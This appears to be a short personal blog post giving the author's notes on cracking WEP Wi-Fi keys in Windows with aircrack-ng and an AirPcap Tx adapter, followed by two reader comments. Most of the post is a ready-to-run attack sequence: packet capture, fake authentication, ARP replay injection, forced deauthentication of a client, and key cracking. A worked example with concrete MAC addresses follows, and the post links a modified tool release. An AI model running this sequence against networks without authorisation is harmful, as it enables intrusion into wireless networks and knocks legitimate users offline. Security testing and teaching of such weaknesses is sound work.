ARP injection in Windows using AirPcap Tx

Finally, I’ve had time to write down my notes on using aircrack-ng with the Airpcap Tx adapter in Windows. Before you read on, please be aware that this isn’t meant to be a guide or tutorial, it’s just my notes. Thanky 🙂

Basics

Start capturing:

airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile

Fake auth:

aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC -h AIRPCAPMAC \\.\airpcap00

Start attack:

aireplay-ng --arpreplay -b BSSIDMAC -h CLIENTMAC \\.\airpcap00

Deauth (if we need ARPs):

aireplay-ng –deauth 3 -a BSSIDMAC -c CLIENTMAC \\.\airpcap00

Start cracking:

aircrack-ng -z mycapturefile.cap

Worked example:

airodump-ng.exe \\.\airpcap00 airpcap 11 mycapturefile
aireplay-ng --fakeauth 0 -e "WEP" -a 00:a0:c5:9d:d5:50 -h 00:02:72:67:92:8a \\.\airpcap00
aireplay-ng --arpreplay -b 00:a0:c5:9d:d5:50 -h 00:90:4b:eb:9b:36 \\.\airpcap00
aireplay-ng --deauth 3 -a 00:a0:c5:9d:d5:50 -c 00:90:4b:eb:9b:36 \\.\airpcap00
aircrack-ng -z mycapturefile.cap

Download

I’ve prepared a special release of the aircrack-ng tools originally prepared by CACE Technologies on the AirPcap CDROM. It replaces the new aireplay-ng.exe with an older one which, in my tests, appears to perform better.

Download the release of aircrack-ng for AirPcap Tx

Written by Phil Wiffen

Phil is an IT Professional working in Cambridge, England. He generally blogs about useful solutions that he comes across in his work/play.

2 Comments

Vic

how do I find the Mac-address of the Airpcap TX usb adapter? It doesn’t show in ipconfig…

Phil Wiffen

Vic: it’s written on the adapter itself. Usually where the sticky label is 🙂 It doesn’t show up in ipconfig because, technically, it’s not a “real” Windows network adapter.

Comments are closed.